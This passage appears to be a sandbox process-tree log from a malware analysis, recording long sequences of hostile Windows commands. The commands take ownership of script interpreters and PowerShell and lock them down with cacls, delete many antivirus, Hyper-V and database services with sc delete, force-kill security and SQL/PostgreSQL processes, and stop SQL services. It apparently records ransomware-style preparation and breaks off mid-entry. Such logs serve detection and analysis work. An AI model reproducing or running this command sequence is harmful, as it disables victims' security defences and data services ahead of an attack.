C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4056

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:3884

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\wscript.exe /a
3⤵
- Modifies file permissions
PID:1040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2292

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
3⤵
PID:1696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3584

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
3⤵
PID:1164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4368

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
3⤵
PID:2072

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
3⤵
PID:4160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:512

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
3⤵
PID:200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4360

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
3⤵
PID:3240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1572

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d system
3⤵
PID:5000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5076

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:764

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cscript.exe /a
3⤵
- Modifies file permissions
PID:4148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:660

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /g Administrators:f
3⤵
PID:4864

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Users:r
3⤵
PID:4604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1728

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
3⤵
PID:1136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:668

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d SERVICE
3⤵
PID:3728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3284

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
3⤵
PID:1352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5024

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d "network service"
3⤵
PID:2452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4580

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d system
3⤵
PID:4048

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5080

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cscript.exe /a
3⤵
- Modifies file permissions
PID:4412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1756

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
3⤵
PID:2944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
3⤵
PID:2388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3880

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
3⤵
PID:4424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4984

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
3⤵
PID:2960

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
3⤵
PID:4504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:236

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
3⤵
PID:2176

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d system
3⤵
PID:4128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3748

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:3648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1580

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:2464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4332

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:1688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4108

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:3200

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:3968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3196

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:3640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4432

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:3500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4168

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:2784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4044

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:2824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4316

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:2108

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:2588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1676

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:4996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2484

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:3632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:600

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3224

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:4420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:604

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2604

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:3280

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3596

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:4084

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\ProgramData /a
3⤵
- Modifies file permissions
PID:4396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3396

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /g Administrators:f
3⤵
PID:428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2488

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Users:r
3⤵
PID:4780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4840

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Administrators:r
3⤵
PID:3752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1540

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d SERVICE
3⤵
PID:4056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:524

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssqlserver
3⤵
PID:3412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1308

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d "network service"
3⤵
PID:2124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1360

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d system
3⤵
PID:4088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3104

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssql$sqlexpress
3⤵
PID:4348

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Users\Public /a
3⤵
- Modifies file permissions
PID:2968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5056

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /g Administrators:f
3⤵
PID:1564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1384

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Users:r
3⤵
PID:4776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2840

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Administrators:r
3⤵
PID:4180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3652

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d SERVICE
3⤵
PID:3440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1072

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssqlserver
3⤵
PID:2928

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d "network service"
3⤵
PID:2100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3196

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d system
3⤵
PID:4448

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssql$sqlexpress
3⤵
PID:4168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:4232

C:\Windows\SysWOW64\sc.exe
sc delete "vmickvpexchange"
3⤵
PID:4528

C:\Windows\SysWOW64\sc.exe
sc delete "vmicguestinterface"
3⤵
PID:4480

C:\Windows\SysWOW64\sc.exe
sc delete "vmicshutdown"
3⤵
- Launches sc.exe
PID:1316

C:\Windows\SysWOW64\sc.exe
sc delete "vmicheartbeat"
3⤵
PID:3752

C:\Windows\SysWOW64\sc.exe
sc delete "vmicrdv"
3⤵
PID:3788

C:\Windows\SysWOW64\sc.exe
sc delete "storflt"
3⤵
PID:2384

C:\Windows\SysWOW64\sc.exe
sc delete "vmictimesync"
3⤵
PID:3100

C:\Windows\SysWOW64\sc.exe
sc delete "vmicvss"
3⤵
PID:1308

C:\Windows\SysWOW64\sc.exe
sc delete "hvdsvc"
3⤵
PID:3728

C:\Windows\SysWOW64\sc.exe
sc delete "nvspwmi"
3⤵
- Launches sc.exe
PID:3732

C:\Windows\SysWOW64\sc.exe
sc delete "wmms"
3⤵
PID:2060

C:\Windows\SysWOW64\sc.exe
sc delete "AvgAdminServer"
3⤵
PID:4608

C:\Windows\SysWOW64\sc.exe
sc delete "AVG Antivirus"
3⤵
- Launches sc.exe
PID:2820

C:\Windows\SysWOW64\sc.exe
sc delete "avgAdminClient"
3⤵
PID:3224

C:\Windows\SysWOW64\sc.exe
sc delete "SAVService"
3⤵
PID:1092

C:\Windows\SysWOW64\sc.exe
sc delete "SAVAdminService"
3⤵
PID:2768

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos AutoUpdate Service"
3⤵
PID:4180

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Clean Service"
3⤵
PID:4760

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Device Control Service"
3⤵
PID:3912

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
- Launches sc.exe
PID:3404

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos File Scanner Service"
3⤵
PID:4172

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Health Service"
3⤵
- Launches sc.exe
PID:4532

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Agent"
3⤵
PID:4044

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Client"
3⤵
PID:3504

C:\Windows\SysWOW64\sc.exe
sc delete "SntpService"
3⤵
PID:2964

C:\Windows\SysWOW64\sc.exe
sc delete "swc_service"
3⤵
PID:3296

C:\Windows\SysWOW64\sc.exe
sc delete "swi_service"
3⤵
PID:4372

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos UI"
3⤵
PID:504

C:\Windows\SysWOW64\sc.exe
sc delete "swi_update"
3⤵
PID:3788

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Web Control Service"
3⤵
- Launches sc.exe
PID:3244

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos System Protection Service"
3⤵
PID:880

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Safestore Service"
3⤵
- Launches sc.exe
PID:4844

C:\Windows\SysWOW64\sc.exe
sc delete "hmpalertsvc"
3⤵
- Launches sc.exe
PID:3732

C:\Windows\SysWOW64\sc.exe
sc delete "RpcEptMapper"
3⤵
PID:4976

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
PID:2164

C:\Windows\SysWOW64\sc.exe
sc delete "SophosFIM"
3⤵
PID:3744

C:\Windows\SysWOW64\sc.exe
sc delete "swi_filter"
3⤵
PID:2128

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdGuardianDefaultInstance"
3⤵
PID:1852

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdServerDefaultInstance"
3⤵
PID:2948

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
3⤵
PID:3428

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLSERVER"
3⤵
PID:208

C:\Windows\SysWOW64\sc.exe
sc delete "SQLSERVERAGENT"
3⤵
- Launches sc.exe
PID:2308

C:\Windows\SysWOW64\sc.exe
sc delete "SQLBrowser"
3⤵
PID:4500

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY"
3⤵
PID:1296

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer130"
3⤵
PID:4780

C:\Windows\SysWOW64\sc.exe
sc delete "SSISTELEMETRY130"
3⤵
PID:2536

C:\Windows\SysWOW64\sc.exe
sc delete "SQLWriter"
3⤵
PID:2168

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$VEEAMSQL2012"
3⤵
PID:504

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$VEEAMSQL2012"
3⤵
PID:4056

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL"
3⤵
PID:1904

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent"
3⤵
- Launches sc.exe
PID:2668

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerADHelper100"
3⤵
- Launches sc.exe
PID:4196

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerOLAPService"
3⤵
- Launches sc.exe
PID:508

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer100"
3⤵
PID:1352

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer"
3⤵
PID:4176

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY$HL"
3⤵
- Launches sc.exe
PID:2664

C:\Windows\SysWOW64\sc.exe
sc delete "TMBMServer"
3⤵
PID:5100

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$PROGID"
3⤵
PID:412

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$WOLTERSKLUWER"
3⤵
PID:32

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$PROGID"
3⤵
PID:4460

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$WOLTERSKLUWER"
3⤵
PID:3424

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher$OPTIMA"
3⤵
PID:3468

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$OPTIMA"
3⤵
PID:2376

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$OPTIMA"
3⤵
PID:3824

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer$OPTIMA"
3⤵
PID:3568

C:\Windows\SysWOW64\sc.exe
sc delete "msftesql$SQLEXPRESS"
3⤵
PID:4448

C:\Windows\SysWOW64\sc.exe
sc delete "postgresql-x64-9.4"
3⤵
PID:3644

C:\Windows\SysWOW64\sc.exe
sc delete "WRSVC"
3⤵
PID:2552

C:\Windows\SysWOW64\sc.exe
sc delete "ekrn"
3⤵
PID:3596

C:\Windows\SysWOW64\sc.exe
sc delete "ekrnEpsw"
3⤵
PID:5044

C:\Windows\SysWOW64\sc.exe
sc delete "klim6"
3⤵
PID:2432

C:\Windows\SysWOW64\sc.exe
sc delete "AVP18.0.0"
3⤵
PID:5020

C:\Windows\SysWOW64\sc.exe
sc delete "KLIF"
3⤵
PID:1436

C:\Windows\SysWOW64\sc.exe
sc delete "klpd"
3⤵
PID:4744

C:\Windows\SysWOW64\sc.exe
sc delete "klflt"
3⤵
- Launches sc.exe
PID:260

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupdisk"
3⤵
PID:784

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupflt"
3⤵
- Launches sc.exe
PID:4480

C:\Windows\SysWOW64\sc.exe
sc delete "klkbdflt"
3⤵
PID:4820

C:\Windows\SysWOW64\sc.exe
sc delete "klmouflt"
3⤵
- Launches sc.exe
PID:4740

C:\Windows\SysWOW64\sc.exe
sc delete "klhk"
3⤵
PID:1164

C:\Windows\SysWOW64\sc.exe
sc delete "KSDE1.0.0"
3⤵
PID:2952

C:\Windows\SysWOW64\sc.exe
sc delete "kltap"
3⤵
PID:4352

C:\Windows\SysWOW64\sc.exe
sc delete "ScSecSvc"
3⤵
PID:5016

C:\Windows\SysWOW64\sc.exe
sc delete "Core Mail Protection"
3⤵
PID:4344

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning Server"
3⤵
PID:5112

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning ServerEx"
3⤵
PID:2968

C:\Windows\SysWOW64\sc.exe
sc delete "Online Protection System"
3⤵
PID:1388

C:\Windows\SysWOW64\sc.exe
sc delete "RepairService"
3⤵
- Launches sc.exe
PID:3748

C:\Windows\SysWOW64\sc.exe
sc delete "Core Browsing Protection"
3⤵
PID:2160

C:\Windows\SysWOW64\sc.exe
sc delete "Quick Update Service"
3⤵
PID:4776

C:\Windows\SysWOW64\sc.exe
sc delete "McAfeeFramework"
3⤵
PID:4740

C:\Windows\SysWOW64\sc.exe
sc delete "macmnsvc"
3⤵
PID:4768

C:\Windows\SysWOW64\sc.exe
sc delete "masvc"
3⤵
PID:2980

C:\Windows\SysWOW64\sc.exe
sc delete "mfemms"
3⤵
- Launches sc.exe
PID:2536

C:\Windows\SysWOW64\sc.exe
sc delete "mfevtp"
3⤵
PID:2388

C:\Windows\SysWOW64\sc.exe
sc delete "TmFilter"
3⤵
PID:1476

C:\Windows\SysWOW64\sc.exe
sc delete "TMLWCSService"
3⤵
- Launches sc.exe
PID:4892

C:\Windows\SysWOW64\sc.exe
sc delete "tmusa"
3⤵
PID:5392

C:\Windows\SysWOW64\sc.exe
sc delete "TmPreFilter"
3⤵
PID:4464

C:\Windows\SysWOW64\sc.exe
sc delete "TMSmartRelayService"
3⤵
PID:960

C:\Windows\SysWOW64\sc.exe
sc delete "TMiCRCScanService"
3⤵
PID:1564

C:\Windows\SysWOW64\sc.exe
sc delete "VSApiNt"
3⤵
- Launches sc.exe
PID:3872

C:\Windows\SysWOW64\sc.exe
sc delete "TmCCSF"
3⤵
PID:3052

C:\Windows\SysWOW64\sc.exe
sc delete "tmlisten"
3⤵
PID:2012

C:\Windows\SysWOW64\sc.exe
sc delete "TmProxy"
3⤵
- Launches sc.exe
PID:1040

C:\Windows\SysWOW64\sc.exe
sc delete "ntrtscan"
3⤵
PID:5440

C:\Windows\SysWOW64\sc.exe
sc delete "ofcservice"
3⤵
PID:5836

C:\Windows\SysWOW64\sc.exe
sc delete "TmPfw"
3⤵
PID:5848

C:\Windows\SysWOW64\sc.exe
sc delete "PccNTUpd"
3⤵
PID:5868

C:\Windows\SysWOW64\sc.exe
sc delete "PandaAetherAgent"
3⤵
PID:5420

C:\Windows\SysWOW64\sc.exe
sc delete "PSUAService"
3⤵
PID:208

C:\Windows\SysWOW64\sc.exe
sc delete "NanoServiceMain"
3⤵
PID:1384

C:\Windows\SysWOW64\sc.exe
sc delete "EPIntegrationService"
3⤵
PID:5400

C:\Windows\SysWOW64\sc.exe
sc delete "EPProtectedService"
3⤵
PID:4040

C:\Windows\SysWOW64\sc.exe
sc delete "EPRedline"
3⤵
PID:2488

C:\Windows\SysWOW64\sc.exe
sc delete "EPSecurityService"
3⤵
PID:5972

C:\Windows\SysWOW64\sc.exe
sc delete "EPUpdateService"
3⤵
- Launches sc.exe
PID:1572

C:\Windows\SysWOW64\sc.exe
sc delete "UniFi"
3⤵
PID:276

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im PccNTMon.exe
3⤵
PID:4172

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im NTRtScan.exe
3⤵
- Kills process with taskkill
PID:5756

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmListen.exe
3⤵
PID:5608

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmCCSF.exe
3⤵
PID:4420

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmProxy.exe
3⤵
PID:4820

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
PID:2432

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
PID:5184

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmPfw.exe
3⤵
PID:272

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im CNTAoSMgr.exe
3⤵
PID:6004

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlbrowser.exe
3⤵
PID:2544

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlwriter.exe
3⤵
PID:4840

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
PID:4104

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msmdsrv.exe
3⤵
PID:2496

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im MsDtsSrvr.exe
3⤵
PID:5008

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlceip.exe
3⤵
PID:5288

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
PID:3584

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im Ssms.exe
3⤵
PID:3280

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im SQLAGENT.EXE
3⤵
PID:1384

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdhost.exe
3⤵
PID:1696

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
PID:4396

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
PID:2204

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im ReportingServicesService.exe
3⤵
PID:5016

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msftesql.exe
3⤵
- Kills process with taskkill
PID:1476

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im pg_ctl.exe
3⤵
- Kills process with taskkill
PID:432

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im postgres.exe
3⤵
- Kills process with taskkill
PID:3556

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:4048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:1328

C:\Windows\SysWOW64\net.exe
net stop MSSQL$ISARS
3⤵
PID:760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ISARS
4⤵
PID:5884

C:\Windows\SysWOW64\net.exe
net stop MSSQL$MSFW
3⤵
PID:4848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$MSFW
4⤵
PID:4176

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ISARS
3⤵
PID:4148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ISARS
4⤵
PID:4440

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$MSFW
3⤵
PID:4780

C:\Windows\SysWOW64\net1.exe
